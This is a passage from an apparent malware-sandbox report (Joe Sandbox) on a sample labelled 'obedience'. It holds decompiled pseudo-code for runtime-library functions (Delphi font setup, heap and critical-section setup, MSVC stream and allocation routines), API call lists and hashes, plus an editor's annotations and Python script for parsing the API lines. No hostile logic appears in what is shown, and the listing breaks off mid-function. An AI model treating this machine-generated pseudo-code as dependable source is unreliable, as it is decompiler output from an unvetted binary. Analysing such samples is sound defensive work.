      				 *((intOrPtr*)(_t62 + 0x54)) = E00403BC0(1);
      				 *((intOrPtr*)(_t62 + 0x58)) = E00403BC0(1);
      				_t42 = E00403BC0(1);
      				 *((intOrPtr*)(_t62 + 0x7c)) = _t42;
      				L00407658();
      				_t75 = _t42;
      				L00407348();
      				 *((intOrPtr*)(_t62 + 0x40)) = _t42;
      				L004078C0();
      				_t11 = _t62 + 0x58; // 0x45b12c6e
      				_t45 =  *0x48f7b0; // 0x490920
      				 *((intOrPtr*)( *_t45))(0, 0, E0045E57C,  *_t11, 0, _t75, _t75, 0x5a, 0);
      				 *((intOrPtr*)(_t62 + 0x84)) = E00425958(1);
      				 *((intOrPtr*)(_t62 + 0x88)) = E00425958(1);
      				 *((intOrPtr*)(_t62 + 0x80)) = E00425958(1);
      				E0046268C(_t62, _t62, _t63, _t74);
      				_t15 = _t62 + 0x84; // 0x38004010
      				_t56 =  *_t15;
      				 *((intOrPtr*)(_t56 + 0xc)) = _t62;
      				 *((intOrPtr*)(_t56 + 8)) = 0x46250c;
      				_t18 = _t62 + 0x88; // 0x90000000
      				_t57 =  *_t18;
      				 *((intOrPtr*)(_t57 + 0xc)) = _t62;
      				 *((intOrPtr*)(_t57 + 8)) = 0x46250c;
      				_t21 = _t62 + 0x80; // 0xc8000000
      				_t58 =  *_t21;
      				 *((intOrPtr*)(_t58 + 0xc)) = _t62;
      				 *((intOrPtr*)(_t58 + 8)) = 0x46250c;
      				_t59 = _t62;
      				if(_v5 != 0) {
      					E00403FC0(_t59);
      					_pop( *[fs:0x0]);
      				}
      				return _t62;
      			}

      APIs
      • GetKeyboardLayout.USER32 ref: 00461DED
      • 73BEAC50.USER32(00000000,00000000,?,?,00000000,?,004500BE,00000000,00000000,?,00000000,?,00000000,0045013C), ref: 00461E42
      • 73BEAD70.GDI32(00000000,0000005A,00000000,00000000,?,?,00000000,?,004500BE,00000000,00000000,?,00000000,?,00000000,0045013C), ref: 00461E4C
      • 73BEB380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,?,?,00000000,?,004500BE,00000000,00000000,?,00000000,?), ref: 00461E57
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: B380KeyboardLayout
      • String ID: I$`H$hH
      • API String ID: 648844651-3079996581
      • Opcode ID: eff9e4c898e0bac2161f98e06cebf588281391319af2f9782f7a0d391a0d0318
      • Instruction ID: cbe4f1407969a8ab49285853e35b3ed884bad4dccc21d7a28376ff97dc053e32
      • Opcode Fuzzy Hash: eff9e4c898e0bac2161f98e06cebf588281391319af2f9782f7a0d391a0d0318
      • Instruction Fuzzy Hash: 35311A706142019FC350EF69DD81B497FE4BB05318F4480BAEC18DF3A2E77AA8088F69
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      C-Code - Quality: 84%
      			E6ED94360(void* __ecx) {
      				signed char* _v8;
      				char _v16;
      				signed int _v20;
      				intOrPtr _v28;
      				signed char _v32;
      				signed char* _v48;
      				signed int _v49;
      				char _v56;
      				signed char** _v60;
      				char _v64;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				signed int _t87;
      				signed int _t88;
      				signed char _t91;
      				signed char _t95;
      				signed char** _t100;
      				signed char _t101;
      				signed char** _t103;
      				signed char** _t107;
      				signed char* _t110;
      				signed char* _t115;
      				void* _t116;
      				void* _t117;
      				signed int _t129;
      				char _t134;
      				intOrPtr _t135;
      				signed char** _t136;
      				intOrPtr _t137;
      				signed char** _t148;
      				void* _t151;
      				void* _t152;
      				signed char** _t154;
      				void* _t156;
      				signed char** _t158;
      				signed char _t160;
      				signed char _t162;
      				signed int _t166;
      				void* _t167;
      				void* _t168;
      				void* _t169;
      
      				_push(0xffffffff);
      				_push(0x6eda5618);
      				_push( *[fs:0x0]);
      				_t168 = _t167 - 0x30;
      				_t87 =  *0x6edaf2a0; // 0x267b4ecc
      				_t88 = _t87 ^ _t166;
      				_v20 = _t88;
      				_push(_t116);
      				_push(_t88);
      				 *[fs:0x0] =  &_v16;
      				_t151 = __ecx;
      				_t91 =  *( *(__ecx + 0x20));
      				_t147 = 0;
      				if(_t91 == 0) {
      					L3:
      					__eflags =  *(_t151 + 0x54) - _t147;
      					if( *(_t151 + 0x54) == _t147) {
      						L51:
      						_t92 = _t91 | 0xffffffff;
      						__eflags = _t91 | 0xffffffff;
      						L52:
      						 *[fs:0x0] = _v16;
      						_pop(_t152);
      						_pop(_t156);
      						_pop(_t117);
      						return L6ED95B58(_t92, _t117, _v20 ^ _t166, _t147, _t152, _t156);
      					}
      					_t129 =  *(_t151 + 0x10);
      					_t157 = _t151 + 0x48;
      					__eflags =  *_t129 - _t151 + 0x48;
      					if( *_t129 == _t151 + 0x48) {
      						_t157 =  *((intOrPtr*)(_t151 + 0x3c));
      						 *_t129 =  *((intOrPtr*)(_t151 + 0x3c));
      						 *((intOrPtr*)( *((intOrPtr*)(_t151 + 0x20)))) =  *((intOrPtr*)(_t151 + 0x40));
      						_t129 =  *(_t151 + 0x30);
      						__eflags = 0;
      						 *_t129 = 0;
      					}
      					__eflags =  *(_t151 + 0x44) - _t147;
      					if(__eflags != 0) {
      						_v28 = 0xf;
      						_v32 = _t147;
      						_v48 = _t147;
      						_v8 = _t147;
      						_t147 =  *(_t151 + 0x54);
      						_push( *(_t151 + 0x54));
      						_t118 = E6ED96326(_t116, _t151, _t157, __eflags);
      						_t169 = _t168 + 4;
      						__eflags = _t118 - 0xffffffff;
      						if(_t118 == 0xffffffff) {
      							L42:
      							_t91 = L6ED937E0( &_v48);
      							goto L51;
      						}
      						while(1) {
      							_t95 = _v32;
      							__eflags = (_t129 | 0xffffffff) - _t95 - 1;
      							if((_t129 | 0xffffffff) - _t95 <= 1) {
      								break;
      							}
      							_t162 = _t95 + 1;
      							__eflags = _t162 - 0xfffffffe;
      							if(_t162 > 0xfffffffe) {
      								break;
      							}
      							_t135 = _v28;
      							__eflags = _t135 - _t162;
      							if(_t135 >= _t162) {
      								__eflags = _t162;
      								if(_t162 != 0) {
      									L15:
      									__eflags = _t135 - 0x10;
      									_t136 = _v48;
      									if(_t135 < 0x10) {
      										_t136 =  &_v48;
      									}
      									 *((char*)(_t136 + _t95)) = _t118;
      									__eflags = _v28 - 0x10;
      									_t100 = _v48;
      									_v32 = _t162;
      									if(_v28 < 0x10) {
      										_t100 =  &_v48;
      									}
      									 *((char*)(_t100 + _t162)) = 0;
      									L20:
      									_t101 = _v32;
      									_t137 = _v28;
      									L21:
      									_t148 = _v48;
      									__eflags = _t137 - 0x10;
      									if(_t137 < 0x10) {
      										_v60 =  &_v48;
      									} else {
      										_v60 = _t148;
      									}
      									__eflags = _t137 - 0x10;
      									if(_t137 < 0x10) {
      										_t148 =  &_v48;
      									}
      									_t129 =  *(_t151 + 0x44);
      									_t164 =  *_t129;
      									_t118 = _v60 + _t101;
      									_t147 = _t151 + 0x4c;
      									_t91 =  *((intOrPtr*)( *((intOrPtr*)( *_t129 + 0x10))))(_t151 + 0x4c, _t148, _v60 + _t101,  &_v56,  &_v49,  &_v48,  &_v64);
      									__eflags = _t91;
      									if(_t91 < 0) {
      										L49:
      										__eflags = _v28 - 0x10;
      										if(_v28 >= 0x10) {
      											_t147 = _v48;
      											_push(_v48);
      											_t91 = L6ED95B4D();
      										}
      										goto L51;
      									} else {
      										__eflags = _t91 - 1;
      										if(_t91 <= 1) {
      											__eflags = _v64 -  &_v49;
      											if(_v64 !=  &_v49) {
      												L44:
      												__eflags = _v28 - 0x10;
      												_t158 = _v48;
      												if(_v28 < 0x10) {
      													_t158 =  &_v48;
      												}
      												_t160 = _t158 - _v56 + _v32;
      												__eflags = _t160;
      												if(__eflags <= 0) {
      													L48:
      													L6ED937E0( &_v48);
      													_t92 = _v49 & 0x000000ff;
      													goto L52;
      												} else {
      													do {
      														_t147 =  *(_t151 + 0x54);
      														_t134 =  *((char*)(_t160 + _v56 - 1));
      														_t160 = _t160 - 1;
      														_push( *(_t151 + 0x54));
      														_push(_t134);
      														E6ED965F9(_t118, _t151, _t160, __eflags);
      														_t169 = _t169 + 8;
      														__eflags = _t160;
      													} while (__eflags > 0);
      													goto L48;
      												}
      											}
      											__eflags = _v28 - 0x10;
      											_t103 = _v48;
      											if(_v28 < 0x10) {
      												_t103 =  &_v48;
      											}
      											_t147 = _v56 - _t103;
      											__eflags = _v56 - _t103;
      											_t129 =  &_v48;
      											E6ED94C00(_t129, 0, _v56 - _t103);
      											L41:
      											_push( *(_t151 + 0x54));
      											_t118 = E6ED96326(_t118, _t151, _t164, __eflags);
      											_t169 = _t169 + 4;
      											__eflags = _t118 - 0xffffffff;
      											if(_t118 != 0xffffffff) {
      												continue;
      											}
      											goto L42;
      										}
      										__eflags = _t91 - 3;
      										if(_t91 != 3) {
      											goto L49;
      										}
      										__eflags = _v32 - 1;
      										if(__eflags < 0) {
      											goto L41;
      										}
      										__eflags = _v28 - 0x10;
      										_t107 = _v48;
      										if(_v28 < 0x10) {
      											_t107 =  &_v48;
      										}
      										L6ED961E1( &_v49,  &_v49, 1, _t107, 1);
      										L6ED937E0( &_v48);
      										_t92 = _v49 & 0x000000ff;
      										goto L52;
      									}
      								}
      								_t110 = _v48;
      								_v32 = _t162;
      								__eflags = _t135 - 0x10;
      								if(_t135 < 0x10) {
      									_t110 =  &_v48;
      								}
      								 *_t110 = 0;
      								goto L20;
      							}
      							L6ED95590( &_v48, _t147, _t162, _t95);
      							_t137 = _v28;
      							_t101 = _v32;
      							__eflags = _t162;
      							if(_t162 == 0) {
      								goto L21;
      							}
      							goto L15;
      						}
      						E6EDA293D("string too long"); // annotation: std::_Xlength_error, the MSVC STL's basic_string::_Xlen() throw
      						goto L44;
      					} else {
      						_push( *(_t151 + 0x54)); // executed
      						_t91 = E6ED96326(_t116,  *(_t151 + 0x54), _t157, __eflags); // executed
      						__eflags = _t91 - 0xffffffff;
      						if(_t91 == 0xffffffff) {
      							goto L51;
      						}
      						_t92 = _t91 & 0x000000ff;
      						goto L52;
      					}
      				}
      				_t91 =  *( *(__ecx + 0x20));
      				if(_t91 >=  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) + _t91) {
      					goto L3;
      				}
      				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) - 1;
      				_t154 =  *(__ecx + 0x20);
      				_t115 =  *_t154;
      				_t147 =  &(_t115[1]);
      				 *_t154 =  &(_t115[1]);
      				_t92 =  *_t115 & 0x000000ff;
      				goto L52;
      			}

      (per-line instruction addresses of the listing above, 0x6ed94363 to 0x6ed945f1)

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: _fgetc$_memcpy_s
      • String ID: string too long
      • API String ID: 160369518-2556327735
      • Opcode ID: 290d110bad194e3f03dc24b4852473fae76235cd40c0ea55049f7738e33da58e
      • Instruction ID: 5e790ee8eba03aaa36dfced8ba6d41cd421d86d11f921c9abf444ae2714211c4
      • Opcode Fuzzy Hash: 290d110bad194e3f03dc24b4852473fae76235cd40c0ea55049f7738e33da58e
      • Instruction Fuzzy Hash: E1919A71E04619DFDB14CBE8C8C09EEB7B5FF09314F508619E821A7681E775E906DBA0
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      C-Code - Quality: 89%
      			E0046268C(void* __eax, void* __ebx, void* __ecx, void* __edi) {
      				char _v5;
      				struct tagLOGFONTA _v65;
      				struct tagLOGFONTA _v185;
      				struct tagLOGFONTA _v245;
      				void _v405;
      				void* _t23;
      				int _t27;
      				void* _t30;
      				intOrPtr _t38;
      				struct HFONT__* _t41;
      				struct HFONT__* _t45;
      				struct HFONT__* _t49;
      				intOrPtr _t52;
      				intOrPtr _t54;
      				void* _t57;
      				void* _t72;
      				void* _t74;
      				void* _t75;
      				intOrPtr _t76;
      
      				_t72 = __edi;
      				_t74 = _t75;
      				_t76 = _t75 + 0xfffffe6c;
      				_t57 = __eax;
      				_v5 = 0;
      				if( *0x490b7c != 0) {
      					_t54 =  *0x490b7c; // 0x2481268
      					_t2 = _t54 + 0x88; // 0x1
      					_v5 =  *_t2;
      				}
      				_push(_t74);
      				_push(0x4627d1);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t76;
      				if( *0x490b7c != 0) {
      					_t52 =  *0x490b7c; // 0x2481268
      					E00464D04(_t52, 0);
      				}
      				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) { // annotation: SPI_GETICONTITLELOGFONT, cbSize = sizeof(LOGFONTA) = 0x3c
      					_t23 = GetStockObject(0xd); // annotation: SYSTEM_FONT
      					_t7 = _t57 + 0x84; // 0x38004010
      					E00425CE8( *_t7, _t23, _t72);
      				} else {
      					_t49 = CreateFontIndirectA( &_v65); // executed
      					_t6 = _t57 + 0x84; // 0x38004010
      					E00425CE8( *_t6, _t49, _t72);
      				}
      				_v405 = 0x154; // annotation: NONCLIENTMETRICSA.cbSize = 340, the pre-Vista layout (no iPaddedBorderWidth)
      				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed (annotation: SPI_GETNONCLIENTMETRICS)
      				if(_t27 == 0) {
      					_t14 = _t57 + 0x80; // 0xc8000000
      					E00425DCC( *_t14, 8);
      					_t30 = GetStockObject(0xd);
      					_t15 = _t57 + 0x88; // 0x90000000
      					E00425CE8( *_t15, _t30, _t72);
      				} else {
      					_t41 = CreateFontIndirectA( &_v185); // annotation: &_v405 + 220 = lfStatusFont
      					_t11 = _t57 + 0x80; // 0xc8000000
      					E00425CE8( *_t11, _t41, _t72);
      					_t45 = CreateFontIndirectA( &_v245); // annotation: &_v405 + 160 = lfMenuFont
      					_t13 = _t57 + 0x88; // 0x90000000
      					E00425CE8( *_t13, _t45, _t72);
      				}
      				_t16 = _t57 + 0x80; // 0xc8000000
      				E00425B2C( *_t16, 0xff000017); // annotation: COLOR_INFOTEXT | 0xFF000000, Delphi's clInfoText; the object at +0x80 is the hint font
      				_t17 = _t57 + 0x88; // 0x90000000
      				E00425B2C( *_t17, 0xff000007); // annotation: COLOR_MENUTEXT | 0xFF000000, clMenuText; +0x88 is the menu font. With MulDiv(..., 72) in E00425DCC (point size to pixel height) this matches the font setup of the Delphi VCL TScreen constructor (editor's identification; the report does not name it)
      				 *[fs:eax] = 0xff000007;
      				_push(0x4627d8);
      				if( *0x490b7c != 0) {
      					_t38 =  *0x490b7c; // 0x2481268
      					return E00464D04(_t38, _v5);
      				}
      				return 0;
      			}

      (per-line instruction addresses of the listing above, 0x0046268c to 0x004627d0)

      APIs
      • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004626E0
      • CreateFontIndirectA.GDI32(?), ref: 004626ED
      • GetStockObject.GDI32(0000000D), ref: 00462703
        • Part of subcall function 00425DCC: MulDiv.KERNEL32(00000000,?,00000048), ref: 00425DD9
      • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 0046272C
      • CreateFontIndirectA.GDI32(?), ref: 0046273C
      • CreateFontIndirectA.GDI32(?), ref: 00462755
      • GetStockObject.GDI32(0000000D), ref: 0046277B
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
      • String ID:
      • API String ID: 2891467149-0
      • Opcode ID: 0f1e32749af3e71fc4595732bb9e634a40be76ee7e03f66890bdd669dc6af00b
      • Instruction ID: def7c6e9a9eb7418f64a5ff5c4d42f488a08ba6007ab330fd4d9eb85c3c9d376
      • Opcode Fuzzy Hash: 0f1e32749af3e71fc4595732bb9e634a40be76ee7e03f66890bdd669dc6af00b
      • Instruction Fuzzy Hash: AD318A30704705AFD750FBB5DC41F9A37A4AB44309F54807BB908DB2D6FA78A845C76A
      Uniqueness

      Uniqueness Score: -1.00%
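
Added example (the editor's own Python, not code from the Joe Sandbox report or from the sample): it parses APIs lines in the format this page prints them, resolves the raw immediates to their Windows SDK names, and matches the direct calls of E0046268C against the font-setup call sequence of the Delphi VCL TScreen constructor. That identification is the editor's reading of the constants (SPI_GETICONTITLELOGFONT with a 0x3c LOGFONTA, SPI_GETNONCLIENTMETRICS with cbSize 0x154, SYSTEM_FONT fallbacks, the 0xff0000xx TColor system colours); the report itself does not name the function. The sample block is copied from the APIs list above; treating the 0x154 printed in the pvParam position as the buffer's cbSize (the listing writes _v405 = 0x154 into that buffer) is an assumption about how the sandbox renders pointer arguments.

```python
"""Parse Joe Sandbox 'APIs' lines, name the Win32 immediates, and match a call-sequence
signature (the editor's VCL TScreen font-init sequence for E0046268C)."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Union

Arg = Union[int, str]  # hex immediate, or "?" when the sandbox could not resolve the value


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: int                   # call-site address
    subcall_of: Optional[int]  # set for lines nested under "Part of subcall function <addr>"


# Line shapes as printed on this page, e.g.
#   • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004626E0
#   • GetSystemMetrics.USER32 ref: 0042D682
#     • Part of subcall function 00425DCC: MulDiv.KERNEL32(00000000,?,00000048), ref: 00425DD9
_API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w@:]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def _parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    return "?" if tok == "?" else int(tok, 16)


def parse_api_lines(text: str) -> List[ApiCall]:
    """One ApiCall per API line; headings such as 'APIs' and blank lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [_parse_arg(a) for a in raw.split(",")] if raw else []
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


# SDK names for the immediates in this listing (winuser.h / wingdi.h; 32-bit ANSI struct sizes).
SPI_NAMES = {0x1F: "SPI_GETICONTITLELOGFONT", 0x29: "SPI_GETNONCLIENTMETRICS"}
STOCK_OBJECTS = {13: "SYSTEM_FONT", 17: "DEFAULT_GUI_FONT"}
STRUCT_SIZES = {0x3C: "sizeof(LOGFONTA)", 0x154: "sizeof(NONCLIENTMETRICSA)"}
_ARG_NAMES: Dict[str, Dict[int, Dict[int, str]]] = {
    "SystemParametersInfoA": {0: SPI_NAMES, 1: STRUCT_SIZES, 2: STRUCT_SIZES},
    "GetStockObject": {0: STOCK_OBJECTS},
}


def describe(call: ApiCall) -> str:
    """Render a call with known immediates replaced by their SDK names."""
    names = _ARG_NAMES.get(call.api, {})
    out = []
    for i, a in enumerate(call.args):
        if a == "?":
            out.append("?")
        else:
            out.append(names.get(i, {}).get(a, hex(a) if a > 9 else str(a)))
    return f"{call.api}({', '.join(out)})"


Predicate = Callable[[ApiCall], bool]


def _api(name: str, at: Optional[Dict[int, int]] = None) -> Predicate:
    """Predicate: the call is `name` and every argument index in `at` holds the given immediate."""
    at = at or {}
    return lambda c: c.api == name and all(len(c.args) > i and c.args[i] == v for i, v in at.items())


# Direct calls of E0046268C in address order.  Both arms of each if/else appear because the
# listing is ordered by call site, not by one execution path.
VCL_TSCREEN_FONT_INIT: List[Predicate] = [
    _api("SystemParametersInfoA", {0: 0x1F, 1: 0x3C}),   # icon-title LOGFONTA
    _api("CreateFontIndirectA"),
    _api("GetStockObject", {0: 13}),                     # SYSTEM_FONT fallback
    _api("SystemParametersInfoA", {0: 0x29, 2: 0x154}),  # NONCLIENTMETRICSA, cbSize 340
    _api("CreateFontIndirectA"),                         # lfStatusFont
    _api("CreateFontIndirectA"),                         # lfMenuFont
    _api("GetStockObject", {0: 13}),
]


def direct_calls(calls: List[ApiCall]) -> List[ApiCall]:
    """Drop 'Part of subcall' entries and order by call-site address."""
    return sorted((c for c in calls if c.subcall_of is None), key=lambda c: c.ref)


def matches_signature(calls: List[ApiCall], signature: List[Predicate]) -> bool:
    """Ordered-subsequence match: each predicate must hit a call after the previous hit."""
    it = iter(calls)
    return all(any(pred(c) for c in it) for pred in signature)


# Constructed sample: the APIs block of E0046268C as printed on this page.
E0046268C_APIS = """\
APIs
• SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004626E0
• CreateFontIndirectA.GDI32(?), ref: 004626ED
• GetStockObject.GDI32(0000000D), ref: 00462703
  • Part of subcall function 00425DCC: MulDiv.KERNEL32(00000000,?,00000048), ref: 00425DD9
• SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 0046272C
• CreateFontIndirectA.GDI32(?), ref: 0046273C
• CreateFontIndirectA.GDI32(?), ref: 00462755
• GetStockObject.GDI32(0000000D), ref: 0046277B
"""

if __name__ == "__main__":
    parsed = parse_api_lines(E0046268C_APIS)
    for c in parsed:
        print(f"{c.ref:08X} {'  ' if c.subcall_of else ''}{describe(c)}")
    print("VCL TScreen font-init sequence:", matches_signature(direct_calls(parsed), VCL_TSCREEN_FONT_INIT))
```

The signature is an ordered subsequence rather than an exact list, so it still fires when subcall lines or unrelated calls sit between the anchors; if that produces false positives, add a predicate on the distance between consecutive `ref` values. Recognising runtime-library code this way (here the VCL; the MSVC operator new and basic_filebuf routines in the 6ED90000 module are the same kind of thing) lets the analyst set those functions aside and spend time on the sample's own logic.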

      Control-flow Graph

      Basic blocks (node: address range, calls -> successors):
      • 594: 401c1c-401c3f, RtlInitializeCriticalSection -> 595, 596
      • 595: 401c41-401c46, RtlEnterCriticalSection -> 596
      • 596: 401c4b-401c81, call 401498 * 3, LocalAlloc -> 603, 604
      • 604: 401c83 -> 605
      • 605: 401c88-401c9a (loop) -> 605, 607
      • 607: 401c9c-401cbc -> 603
      • 603: 401cc3-401cd7 -> 608, 609
      • 609: 401cd9-401cde, RtlLeaveCriticalSection -> 608
      • 608: 401ce3
      C-Code - Quality: 69%
      			E00401C1C() {
      				intOrPtr* _v8;
      				void* _t17;
      				signed int _t19;
      				intOrPtr _t28;
      				void* _t29;
      				intOrPtr _t34;
      
      				_push(_t34);
      				_push(E00401CE4);
      				_push( *[fs:edx]);
      				 *[fs:edx] = _t34; // annotation: try/finally frame pushed on the fs:[0] SEH chain, handler E00401CE4
      				_push(0x4905c8);
      				L004013F4(); // annotation: RtlInitializeCriticalSection(0x4905c8), per the APIs list below
      				if( *0x490049 != 0) { // annotation: the lock is only taken when the byte flag at 0x490049 (multithreaded mode) is set
      					_push(0x4905c8);
      					L004013FC(); // annotation: RtlEnterCriticalSection
      				}
      				E00401498(0x4905e8);
      				E00401498(0x4905f8);
      				E00401498(0x490624);
      				_t17 = LocalAlloc(0, 0xff8); // executed (annotation: LMEM_FIXED, 4088 bytes)
      				 *0x490620 = _t17;
      				if( *0x490620 != 0) {
      					_t19 = 3;
      					do { // annotation: _t19 * 4 - 0xc runs from 0x0 to 0xff4, so every dword of the new block is zeroed
      						_t29 =  *0x490620; // 0x808628
      						 *((intOrPtr*)(_t29 + _t19 * 4 - 0xc)) = 0;
      						_t19 = _t19 + 1;
      					} while (_t19 != 0x401);
      					_v8 = 0x490608; // annotation: list head at 0x490608; next and prev both point at the head (empty circular doubly-linked list)
      					 *((intOrPtr*)(_v8 + 4)) = _v8;
      					 *_v8 = _v8;
      					 *0x490614 = _v8;
      					 *0x4905c0 = 1; // annotation: initialised flag
      				}
      				_pop(_t28);
      				 *[fs:eax] = _t28;
      				_push(E00401CEB);
      				if( *0x490049 != 0) {
      					_push(0x4905c8);
      					L00401404(); // annotation: RtlLeaveCriticalSection, per the APIs list below
      					return 0;
      				}
      				return 0;
      			}

      (per-line instruction addresses of the listing above, 0x00401c22 to 0x00401ce3)

      APIs
      • RtlInitializeCriticalSection.KERNEL32(004905C8,00000000,00401CE4,?,00000000,?,00402642,00000000), ref: 00401C33
      • RtlEnterCriticalSection.KERNEL32(004905C8,004905C8,00000000,00401CE4,?,00000000,?,00402642,00000000), ref: 00401C46
      • LocalAlloc.KERNEL32(00000000,00000FF8,004905C8,00000000,00401CE4,?,00000000,?,00402642,00000000), ref: 00401C70
      • RtlLeaveCriticalSection.KERNEL32(004905C8,00401CEB,00000000,00401CE4,?,00000000,?,00402642,00000000), ref: 00401CDE
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
      • String ID:
      • API String ID: 730355536-0
      • Opcode ID: d050b6857653eea67ce8a629f36398fb7337f322f86e8f88e53513697ead930d
      • Instruction ID: b08383492a40db6a362fa1f166d647523cd183d4f6bca2ca8448ce6046a23857
      • Opcode Fuzzy Hash: d050b6857653eea67ce8a629f36398fb7337f322f86e8f88e53513697ead930d
      • Instruction Fuzzy Hash: F2115870688644AFEB15EB9ED905B697BE1EB9A304F51807BE400A76F2C77C8D108B1D
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      C-Code - Quality: 89%
      			E6ED96310(void* __edx, void* __edi, void* __esi, void* __eflags) {
      				intOrPtr _v0;
      				char* _v12;
      				char _v24;
      				void* _t10;
      				signed int _t11;
      				void* _t23;
      				void* _t24;
      				void* _t26;
      
      				L0:
      				while(1) {
      					L0:
      					_t26 = __esi;
      					_t24 = __edi;
      					_t23 = __edx;
      					_pop(_t28);
      					while(1) {
      						L3:
      						_t10 = E6ED989A7(_t23, _t24, _t26, _v0); // executed (annotation: malloc(size), per the APIs list below)
      						if(_t10 != 0) {
      							break;
      						}
      						L2:
      						_t11 = L6ED99002(_t10, _v0); // annotation: _callnewh(size); while a new-handler returns nonzero the loop retries malloc (MSVC operator new pattern)
      						__eflags = _t11;
      						if(_t11 == 0) {
